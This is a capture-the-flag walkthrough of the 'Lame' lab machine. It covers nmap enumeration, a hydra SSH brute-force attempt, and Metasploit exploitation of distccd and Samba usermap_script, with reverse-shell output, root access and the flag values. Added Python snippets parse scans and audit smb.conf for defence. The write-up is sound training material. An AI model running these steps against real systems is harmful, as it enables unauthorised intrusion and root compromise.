Lame
Starting information
Machine IP: 10.10.10.3
System: Linux
Network enumeration
I start by modifying my /etc/hosts file to avoid writing the IP every time:
10.10.10.3 lame
Then I look for open ports :
nmap lame -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:18 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.034s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Now that I know I have some interesting ports open, I run nmap with its scripts:
nmap lame -A -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:18 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.034s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.7
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.81 seconds
The first thing I see is that anonymous login is authorised on the FTP server. Unfortunately, no folders are visible, and trying to access them directly returns an error. The anonymous login seems to be a dead end.
Not sure where to go next, I try to brute-force the password for the SSH user admin, but to no avail:
hydra -l admin -P ~/Resources/SecurityTools/IntruderPayloads/FuzzLists/passwords_quick.txt lame ssh -t 4
I end up doing a full port scan of the target in case I missed something important, and I start an OpenVAS scan in parallel:
nmap -p- lame -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 17:27 CEST
Nmap scan report for lame (10.10.10.3)
Host is up (0.033s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
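As an added example (not part of the original writeup), here is a small Python parser for nmap's normal output that turns the port table above into structured records and flags the exposures this enumeration revealed, so the same triage can be done from the defender's side. The sample input is constructed from the two scans above, and the rule set in flag_exposures is a hypothetical starting point, not a vulnerability scanner.

```python
import re
from dataclasses import dataclass, field
# Constructed sample: nmap -A port table above plus the distccd row from the -p- scan.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd
"""
# port/proto, state, service name, then an optional free-text version string
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str = ""
    scripts: list = field(default_factory=list)  # NSE script lines for this port

def parse_nmap(text):
    """Turn port rows into Service records; '|' script lines attach to the row above."""
    services, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            current = Service(int(port), proto, state, name, version or "")
            services.append(current)
        elif line.startswith("|") and current is not None:
            current.scripts.append(line.lstrip("|_ "))
    return services

def flag_exposures(services):
    """Map port -> reason, using a hypothetical triage list built from what this host exposed."""
    findings = {}
    for s in services:
        if s.state != "open":
            continue
        if s.name == "distccd":
            findings[s.port] = "distccd reachable from the network (CVE-2004-2687): restrict clients with --allow"
        elif s.version.startswith("Samba smbd 3"):
            findings[s.port] = "Samba 3.x (CVE-2007-2447): check smb.conf for 'username map script' and patch"
        elif any("Anonymous FTP login allowed" in sc for sc in s.scripts):
            findings[s.port] = "anonymous FTP login enabled"
    return findings
```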
DistCCD
distccd is the server for the distcc distributed compiler. It accepts and runs compilation jobs for network clients. distcc can run over either TCP or a connection command such as ssh.
My OpenVAS scan has not yet finished, but I can already see two high-severity vulnerabilities, one of which is a remote code execution targeting distccd: CVE-2004-2687. An exploit for this CVE is available in Metasploit, so let's fire it up.
First I make sure postgresql is started.
service postgresql start
Then I start Metasploit.
msfconsole
Here is the exploit available for distcc:
msf5 > search distccd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
I select the exploit with use:
msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) >
For the options I just need to specify the host and the port:
msf5 exploit(unix/misc/distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 3632 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
I set the RHOSTS option with the set command and check that the option is correctly set:
msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.3 yes The target address range or CIDR identifier
RPORT 3632 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
Great! Everything seems to be properly configured, now I can try the exploit:
msf5 exploit(unix/misc/distcc_exec) > run
[*] Started reverse TCP double handler on 10.10.14.7:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4WOw9Ir4tJSBhdJM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4WOw9Ir4tJSBhdJM\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.7:4444 -> 10.10.10.3:53376) at 2019-09-22 18:15:32 +0200
ls
5140.jsvc_up
Looks like it worked!
User flag
Now that I have access to a shell on the machine, finding the user flag shouldn't be too much of a hassle.
I look at the home directories and search for the file user.txt:
cd /home
ls
ftp
makis
service
user
ls makis
user.txt
cat makis/user.txt
69454a937d94f5f0225ea00acd2e84c5
Root flag
Retrieving the user flag was a piece of cake, so I suspect that the root flag might be a bit more difficult.
ls /root
Desktop
reset_logs.sh
root.txt
vnc.log
cat /root/root.txt
cat: /root/root.txt: Permission denied
I don't have the permissions to access root.txt. I will have to find a privilege escalation.
From my OpenVAS scan I can see that Samba MS-RPC is vulnerable to a Remote Shell Command Execution Vulnerability: CVE-2007-2447.
The exploit is available in Metasploit:
msf5 > search 2007-2447
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Now I just have to configure it and run it:
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 10.10.14.7:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo gnLmqtNCReENz5i3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "gnLmqtNCReENz5i3\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.7:4444 -> 10.10.10.3:39128) at 2019-09-22 18:35:52 +0200
id
uid=0(root) gid=0(root)
It looks like I am root. Let’s see if I can get the root flag:
ls /root
Desktop
reset_logs.sh
root.txt
vnc.log
cat /root/root.txt
92caac3be140ef409e45721348a4e9df
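The Samba weakness used for the root flag above (CVE-2007-2447) lives in the smb.conf option 'username map script', which Samba 3.0.0 through 3.0.25rc3 handed the client-supplied username to via /bin/sh without escaping. As an added example that is not part of the original writeup, here is a weak configuration beside a corrected one and a small audit that tells them apart; both smb.conf fragments are constructed, not the target's real files.

```python
import configparser

# Constructed smb.conf fragment with the dangerous option set (not the target's real config).
WEAK_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = %h server (Samba)
security = user
username map script = /etc/samba/scripts/mapusers.sh
"""

# Corrected fragment: the script option is dropped. The static 'username map' file
# option is a different setting. The daemon must also be upgraded to 3.0.25 or later.
HARDENED_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = %h server (Samba)
security = user
username map = /etc/samba/smbusers
"""

def load_smb_conf(text):
    # smb.conf is INI-like; interpolation is disabled because values use %h-style macros,
    # and strict=False tolerates the duplicate keys real-world smb.conf files contain.
    cfg = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cfg.read_string(text)
    return cfg

def audit_smb_conf(text):
    """Return findings a defender would act on; an empty list means the check passed."""
    cfg = load_smb_conf(text)
    findings = []
    if cfg.has_section("global"):
        script = (cfg["global"].get("username map script", "") or "").strip()
        if script:
            findings.append(
                f"'username map script = {script}' enables CVE-2007-2447 on Samba "
                "3.0.0-3.0.25rc3; remove the option and upgrade smbd"
            )
    return findings
```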